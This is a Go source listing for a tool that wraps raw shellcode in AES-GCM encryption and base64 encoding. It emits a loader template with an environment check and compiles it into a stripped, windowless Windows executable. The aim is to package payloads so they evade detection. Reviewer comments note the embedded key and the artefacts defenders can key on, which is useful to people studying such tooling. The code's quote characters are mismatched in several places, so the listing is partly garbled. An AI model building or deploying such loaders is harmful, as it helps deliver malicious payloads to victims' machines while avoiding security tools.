Golang AES加密Base64编码Shellcode生成工具
package main
import ( "crypto/aes" "crypto/cipher" "crypto/rand" "encoding/base64" "fmt" "gld/detect" "gld/loader" "gld/util" "io/ioutil" "os" "os/exec" )
// template is the Go source text of the program this tool generates. main
// fills its three %s verbs, in order, with the base64 encodings of the AES
// key, the GCM nonce and the sealed input file.
//
// As written, the generated program returns immediately when
// detect.ContinueRun() reports false; otherwise it base64-decodes the three
// values (discarding decode errors), opens the AES-GCM ciphertext and passes
// the plaintext to loader.X. detect and loader are project packages that are
// not part of this listing, so what they check or do cannot be stated here.
//
// NOTE(review): the key and nonce are stored in the same binary as the
// ciphertext. The encryption therefore only keeps the raw payload bytes from
// appearing verbatim in the file; it gives no confidentiality against
// analysis. The payload can be recovered offline from the three base64
// strings without running the sample.
//
// NOTE(review): the listing is reproduced exactly as published, including
// the quote characters around the %s verbs.
var template = `package main
import ( "crypto/aes" "crypto/cipher" "encoding/base64" "gld/detect" "gld/loader" "gld/util" )
func main() { if !detect.ContinueRun() { return }
key, _ := base64.StdEncoding.DecodeString('%s')
nonce, _ := base64.StdEncoding.DecodeString('%s')
buf, _ := base64.StdEncoding.DecodeString('%s')
block, err := aes.NewCipher(key)
if err != nil {
panic(err.Error())
}
aesgcm, err := cipher.NewGCM(block)
if err != nil {
panic(err.Error())
}
plaintext, err := aesgcm.Open(nil, nonce, buf, nil)
if err != nil {
panic(err.Error())
}
loader.X(plaintext)
} `
// TEMP is the name of the generated source file. main writes it relative to
// the current working directory.
const TEMP = "temp.go"
// main builds one executable from a payload file: it reads the file named by
// os.Args[1], seals it with AES-GCM under a freshly generated 32-byte key and
// 12-byte nonce, renders template into TEMP, and runs "go build" on it.
// The optional os.Args[2] selects "x64" (the default; GOARCH=amd64, output
// x64.exe) or "x86" (GOARCH=386, output x86.exe); any other value aborts.
//
// NOTE(review): host artefacts visible in this function that defenders can
// key on: TEMP is written with mode 0777, is not removed anywhere in this
// function, and holds key, nonce and ciphertext as base64 text; a child
// process "go build -ldflags '-w -s -H=windowsgui' -o <output> temp.go" is
// spawned; the result is named x64.exe or x86.exe in the working directory.
func main() { if len(os.Args) < 2 { println("./gld shellcode.bin [x64/x86]") return }
f := os.Args[1]
raw, err := ioutil.ReadFile(f)
if err != nil {
println("[!] ' + err.Error())
return
}
key := make([]byte, 32)
nonce := make([]byte, 12)
// rand is crypto/rand here. Both return values of Read are discarded, so a
// failed read would go unnoticed.
rand.Read(key)
rand.Read(nonce)
block, err := aes.NewCipher(key)
if err != nil {
println("[!] ' + err.Error())
return
}
aesgcm, err := cipher.NewGCM(block)
if err != nil {
println("[!] ' + err.Error())
return
}
// Seal is called with no additional data; raw now holds the ciphertext with
// the GCM tag appended.
raw = aesgcm.Seal(nil, nonce, raw, nil)
// The rendered source embeds key, nonce and ciphertext side by side, so the
// file on disk is sufficient to recover the original input.
err = ioutil.WriteFile(
TEMP,
[]byte(fmt.Sprintf(
template,
base64.StdEncoding.EncodeToString(key),
base64.StdEncoding.EncodeToString(nonce),
base64.StdEncoding.EncodeToString(raw))),
0777,
)
if err != nil {
println("[!] Generate fail: ' + err.Error())
return
}
println("[*] Generate template")
var arch string
if len(os.Args) > 2 {
arch = os.Args[2]
} else {
arch = "x64"
}
var output string
switch arch {
case "x64":
os.Setenv("GOARCH", "amd64")
output = "x64.exe"
case "x86":
os.Setenv("GOARCH", "386")
output = "x86.exe"
default:
println("[!] Unknown arch")
return
}
println("[*] Compiling ' + output)
// Linker flags: -w and -s omit DWARF data and the symbol table, and
// -H=windowsgui selects the Windows GUI header type. Only the exit status of
// the build is inspected.
err = exec.Command("go", "build", "-ldflags", "-w -s -H=windowsgui", "-o", output, TEMP).Run()
if err != nil {
println("[!] Compile fail: ' + err.Error())
return
}
println("[+] Generate successfully -> ' + output)
}